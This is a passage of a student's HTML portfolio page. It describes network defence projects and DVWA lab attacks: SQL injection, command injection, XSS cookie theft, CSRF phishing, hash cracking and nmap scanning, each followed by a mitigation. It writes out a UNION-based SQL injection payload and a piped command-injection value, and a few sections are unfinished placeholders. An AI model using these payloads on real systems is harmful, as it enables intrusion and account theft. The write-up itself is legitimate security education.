          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
